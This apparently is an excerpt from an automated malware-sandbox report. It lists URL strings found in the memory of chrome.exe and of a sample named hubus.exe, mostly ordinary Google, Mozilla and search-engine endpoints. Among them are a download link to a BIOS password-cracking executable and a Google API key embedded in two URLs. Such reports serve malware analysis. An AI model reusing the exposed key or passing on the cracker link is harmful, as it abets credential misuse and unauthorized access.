                          Source: chrome.exe, 00000002.00000002.12198396285.00002D24035DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
                          Source: chrome.exe, 00000002.00000003.12121625572.00002D240270C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121993386.00002D2402804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com
                          Source: chrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12192756587.00002D2402BC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cart.ebay.com/
                          Source: chrome.exe, 00000002.00000002.12192312816.00002D2402B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cart.godaddy.com/go/checkout
                          Source: chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                          Source: chrome.exe, 00000002.00000002.12193384962.00002D2402CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
                          Source: chrome.exe, 00000002.00000003.12118811954.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                          Source: chrome.exe, 00000002.00000002.12194130563.00002D2402E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12199983480.00002D2403994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12195046159.00002D2403004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                          Source: chrome.exe, 00000002.00000003.12121690986.00002D2403748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12122364326.00002D2402C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12118811954.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12185156115.00002D2000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12104112913.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145351599.00002D2403F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145476171.00002D2403F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102819245.00002D2000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103930290.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102884594.00002D200053C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                          Source: chrome.exe, 00000002.00000003.12102819245.00002D2000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102884594.00002D200053C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/p_4x
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12185156115.00002D2000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12104112913.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145351599.00002D2403F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145476171.00002D2403F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102819245.00002D2000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103930290.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102884594.00002D200053C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145351599.00002D2403F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/AttributionReportingCrossAppWeb
                          Source: chrome.exe, 00000002.00000002.12185156115.00002D2000654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12104112913.00002D2000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12103930290.00002D2000650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                          Source: chrome.exe, 00000002.00000003.12102819245.00002D2000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102884594.00002D200053C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/p_4x
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12102513366.00002D2000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145351599.00002D2403F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145476171.00002D2403F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12185330131.00002D2000698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/KAnonymityServiceJoinServer
                          Source: chrome.exe, 00000002.00000002.12186331740.00002D2402220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
                          Source: chrome.exe, 00000002.00000002.12186331740.00002D2402220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBg
                          Source: chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                          Source: chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                          Source: chrome.exe, 00000002.00000002.12188029688.00002D240243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12108474072.00002D240243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12119374185.00002D240243C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                          Source: chrome.exe, 00000002.00000002.12193143047.00002D2402C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
                          Source: chrome.exe, 00000002.00000002.12193143047.00002D2402C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
                          Source: chrome.exe, 00000002.00000002.12188212582.00002D2402454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                          Source: chrome.exe, 00000002.00000003.12096141028.00007260000DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12096117675.00007260000D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                          Source: chrome.exe, 00000002.00000002.12187510484.00002D2402368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                          Source: chrome.exe, 00000002.00000002.12191342488.00002D2402A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                          Source: chrome.exe, 00000002.00000002.12191689804.00002D2402A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                          Source: chrome.exe, 00000002.00000002.12191689804.00002D2402A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
                          Source: chrome.exe, 00000002.00000002.12192756587.00002D2402BC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com/
                          Source: chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cpx.to
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/593024
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/650547
                          Source: chrome.exe, 00000002.00000002.12196028536.00002D2403204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12116420730.00002D2402C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/655534
                          Source: chrome.exe, 00000002.00000002.12195822771.00002D2403198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186685247.00002D2402284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196476185.00002D24032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
                          Source: chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
                          Source: chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEtall.exe
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188460320.00002D2402524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197687210.00002D24034B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188280827.00002D2402470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                          Source: chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
                          Source: chrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actionsr
                          Source: chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12188460320.00002D2402524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                          Source: chrome.exe, 00000002.00000002.12187570577.00002D2402378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                          Source: chrome.exe, 00000002.00000002.12187570577.00002D2402378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                          Source: chrome.exe, 00000002.00000002.12187570577.00002D2402378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default0A
                          Source: chrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197201532.00002D24033CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000002.00000002.12194236207.00002D2402E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12193772521.00002D2402DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12197881211.00002D240350C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                          Source: chrome.exe, 00000002.00000002.12194634488.00002D2402F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196213873.00002D2403264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196334480.00002D240328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
                          Source: chrome.exe, 00000002.00000003.12121855837.00002D2403930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121572695.00002D24026F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12121757415.00002D2402740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186475572.00002D240225C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                          Source: chrome.exe, 00000002.00000002.12198062457.00002D2403554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12186475572.00002D240225C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194768548.00002D2402FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12198123543.00002D2403570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                          Source: chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12196842993.00002D2403330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194909693.00002D2402FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12191417889.00002D2402A50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12114826026.00002D24023E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                          Source: chrome.exe, 00000002.00000002.12199855867.00002D2403964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaulttler
                          Source: chrome.exe, 00000002.00000002.12188972269.00002D24025B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/settings
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                          Source: chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: chrome.exe, 00000002.00000002.12192977530.00002D2402C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                          Source: chrome.exe, 00000002.00000002.12196734725.00002D240331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ebis.ne.jp
                          Source: chrome.exe, 00000002.00000002.12192756587.00002D2402BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                          Source: chrome.exe, 00000002.00000002.12194699221.00002D2402F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=searchTerms
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                          Source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                          Source: chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12145187690.00002D2403F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.12185330131.00002D2000698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                          Source: chrome.exe, 00000002.00000003.12147098378.00002D20006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12143230023.00002D2403AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                          Source: chrome.exe, 00000002.00000003.12144293546.00002D2403F1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144927817.00002D2403F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144506463.00002D2403F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.12144727824.00002D2403F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/PrivacySandboxAdsAPIsM1Override
                          Source: chrome.exe, 00000002.00000003.12102513366.00002D2000514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
